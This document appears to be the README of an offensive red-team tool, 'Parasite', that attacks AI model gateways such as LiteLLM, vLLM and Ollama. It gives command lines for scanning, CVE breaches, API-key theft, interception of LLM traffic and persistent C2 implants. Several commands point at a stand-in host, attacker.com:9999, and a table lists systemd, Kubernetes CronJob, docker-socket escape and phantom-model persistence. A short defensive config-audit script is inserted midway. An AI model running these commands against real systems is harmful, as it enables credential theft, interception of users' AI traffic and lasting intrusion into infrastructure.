Universal AI Gateway Exploitation Engine — v1.0.0 — 237 tests
AUTHORIZED USE ONLY. This tool requires explicit written authorisation for each engagement. Unauthorized use violates the Computer Misuse Act 1990, CFAA, and equivalent legislation. All operations are logged and Ed25519-signed.
```bash
git clone https://github.com/RichardBarron27/red-specter-specter-parasite
cd red-specter-specter-parasite
pip install -e .
parasite --help
```
```bash
# Generate Ed25519 key
python3 -c "
import os
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.hazmat.primitives import serialization
key = Ed25519PrivateKey.generate()
pem = key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8, serialization.NoEncryption())
# The key is stored unencrypted: create it owner-read/write only (0600) and refuse to overwrite an existing key
fd = os.open('parasite.key', os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
with os.fdopen(fd, 'wb') as f:
    f.write(pem)
print('Key written to parasite.key')
"
export PARASITE_KEY=/path/to/parasite.key
# Create ROE file — must contain exact string
cat > roe.txt << 'EOF'
gateway exploitation authorised
engagement: internal-red-team-2026-06
operator: richard
targets: 192.168.100.0/24
EOF
export PARASITE_ROE_FILE=/path/to/roe.txt
```
Discover and fingerprint AI gateways on a host or CIDR range.
```bash
parasite scan --target 192.168.1.100
parasite scan --target 192.168.1.100 --ports 4000,8000,11434
parasite scan --cidr 10.0.0.0/24 --timeout 2
```
| Flag | Description | Default |
|---|---|---|
| --target | IP address or hostname | required |
| --cidr | CIDR range for subnet scan | — |
| --ports | Comma-separated port list | all known gateway ports |
| --timeout | TCP connect timeout (seconds) | 2.0 |
| --output | JSON output file path | — |
Deep auth analysis and attack surface enumeration. OPEN gate.
```bash
parasite probe --target 192.168.1.100:4000
parasite probe --target 192.168.1.100:4000 --werkzeug --machine-id abc123 --mac 00:23:ae:31:54:61
```
| Flag | Description |
|---|---|
| --target | host:port to probe |
| --werkzeug | Also compute Werkzeug debugger PIN (requires --username, --app-file, --machine-id, --mac) |
| --jwt TOKEN | JWT to attack (brute force + alg:none + RS256 confusion) |
Attempt all applicable CVE exploits. INJECT gate required.
```bash
export PARASITE_KEY=/path/to/parasite.key
parasite breach --target 192.168.1.100:4000
parasite breach --target 192.168.1.100:4000 --cve CVE-2026-42208  # specific CVE only
```
Extract API keys from gateway config, env vars, and memory. INJECT gate required.
```bash
parasite siphon --target 192.168.1.100:4000 --breach-result breach.json
```
Inject LiteLLM CustomLogger to capture all LLM traffic. UNLEASHED gate required.
```bash
export PARASITE_KEY=/path/to/parasite.key
export PARASITE_ROE_FILE=/path/to/roe.txt
parasite intercept --target 192.168.1.100:4000 --c2-url http://attacker.com:9999 --breach-result breach.json
```
Cloud metadata pivot and provider account testing. UNLEASHED gate required.
```bash
parasite traverse --target 192.168.1.100:4000 --breach-result breach.json --credentials creds.json
```
Deploy persistent C2 mechanism. UNLEASHED gate required.
```bash
parasite implant --target 192.168.1.100:4000 \
  --mechanism systemd \
  --c2-url http://attacker.com:9999 \
  --breach-result breach.json
```
| Mechanism | Description | Gate |
|---|---|---|
| systemd | network-helper.service, Restart=always | UNLEASHED |
| k8s | CronJob in kube-system, every 6h | UNLEASHED |
| docker | Escape via /var/run/docker.sock | UNLEASHED |
| litellm_model | Phantom gpt-4o-mini routing to attacker | UNLEASHED |
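
A defender-side check for two of the techniques named above, the injected LiteLLM callback (INTERCEPT) and the `litellm_model` phantom route: audit a proxy config for callbacks and upstream hosts outside an approved baseline. This is an added example, not code from this project; the allowlists, the `audit_litellm_config` helper and the sample config are constructed assumptions.

```python
from urllib.parse import urlparse

# Assumed baseline (not from the page): replace with your own approved values.
APPROVED_CALLBACKS = {"prometheus", "langfuse"}
APPROVED_UPSTREAMS = {"api.openai.com", "api.anthropic.com"}


def audit_litellm_config(cfg):
    """Return a list of (kind, detail) findings for a parsed LiteLLM proxy config."""
    findings = []
    settings = cfg.get("litellm_settings") or {}
    # Callback hooks see every request and response, so any unknown entry matters.
    for key in ("callbacks", "success_callback", "failure_callback"):
        value = settings.get(key) or []
        if isinstance(value, str):
            value = [value]
        for name in value:
            if name not in APPROVED_CALLBACKS:
                findings.append(("unapproved_callback", f"{key}: {name}"))
    seen = {}
    for entry in cfg.get("model_list") or []:
        alias = entry.get("model_name", "<unnamed>")
        params = entry.get("litellm_params") or {}
        api_base = params.get("api_base")
        if api_base:
            host = (urlparse(api_base).hostname or "").lower()
            if host not in APPROVED_UPSTREAMS:
                findings.append(("unapproved_upstream", f"{alias} -> {api_base}"))
        # One alias resolving to different backends deserves a manual look.
        target = (params.get("model"), api_base)
        if alias in seen and seen[alias] != target:
            findings.append(("duplicate_alias", alias))
        seen.setdefault(alias, target)
    return findings


# Constructed sample config (already parsed from YAML into a dict).
SAMPLE = {
    "model_list": [
        {"model_name": "gpt-4o", "litellm_params": {"model": "openai/gpt-4o"}},
        {"model_name": "gpt-4o-mini", "litellm_params": {"model": "openai/gpt-4o-mini"}},
        {"model_name": "gpt-4o-mini", "litellm_params": {
            "model": "openai/gpt-4o-mini", "api_base": "http://203.0.113.7:9999/v1"}},
    ],
    "litellm_settings": {"callbacks": ["prometheus", "helpers.traffic_logger"]},
}

if __name__ == "__main__":
    print(*audit_litellm_config(SAMPLE), sep="\n")
```

Duplicate aliases are also how legitimate load balancing is configured, so treat that finding as a prompt for review rather than proof of tampering. Models added at runtime may be stored outside this file, so apply the same comparison to the proxy's live model inventory.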
Full pipeline: SCAN → PROBE → BREACH → SIPHON → [INTERCEPT → TRAVERSE → IMPLANT] → REPORT
```bash
# OPEN gate — scan + probe only
parasite engage --target 192.168.1.100:4000
# INJECT gate — adds BREACH + SIPHON
parasite engage --target 192.168.1.100:4000 --gate inject
# UNLEASHED gate — full pipeline
parasite engage --target 192.168.1.100:4000 --gate unleashed \
  --c2-url http://attacker.com:9999 \
  --output /tmp/pst-report.json
```
| Variable | Required For | Value |
|---|---|---|
| PARASITE_KEY | INJECT+ | Path to Ed25519 PEM private key file |
| PARASITE_ROE_FILE | UNLEASHED+ | Path to ROE file (must contain "gateway exploitation authorised") |
```jsonc
{
  "report_id": "PST-a1b2c3d4e5f6",  // Ed25519-signed
  "tool_number": 131,
  "version": "1.0.0",
  "layer": "L29 AI Inference Infrastructure",
  "timestamp": 1749499200,
  "gateway": { "type": "litellm", "host": "...", "port": 4000 },
  "breach": { "technique": "cve_2026_42208", "success": true },
  "credential_count": 12,
  "valid_credentials": 8,
  "total_burn_rate_per_hour_usd": 24.00,
  "intercept_active": true,
  "wmd_classes": ["ai_gateway_takeover", ...],
  "mitre_attack": ["T1190", "T1552.001", "T1557", "T1565.001", "T1078", "T1071.001"],
  "mitre_atlas": ["AML.T0043", "AML.T0056", "AML.T0040", "AML.T0051"],
  "_signature": "..."  // hex-encoded Ed25519 signature
}
```
| Type | Default Port | Detection Probe | CVEs |
|---|---|---|---|
| LiteLLM | 4000 | /health → litellm_version | CVE-2026-42271, 42208, 25536 |
| vLLM | 8000 | /health → vllm_version | CVE-2026-22778, CVE-2024-5483 |
| Ollama | 11434 | / → "Ollama is running" | CVE-2026-7482 |
| LM Studio | 1234 | /v1/models → object | — |
| LocalAI | 8080/5001 | /api/v1/ping → pong | — |
| Text Generation WebUI | 7860/5000 | port hint | — |
| OpenWebUI | 3000/8080 | port hint | — |
| HuggingFace TGI | 80/443 | /info → model_id | — |
| Triton Inference Server | 8001/8002 | /v2/health/ready → live | — |
| Ray Serve | 8000 | /api/v1/health → status:OK | — |
| BentoML | 8080 | /readyz → status:ok | — |
| MLflow Serving | 5000 | /api/v1/models/list → models | — |
| Dify | 3000/3100 | port hint | — |
| Flowise | 9999 | port hint | — |
| nginx-ui | 9000 | port hint | CVE-2026-33032 |
| OpenAI-Compatible | any | /v1/models → object + data | CVE-2026-25536 |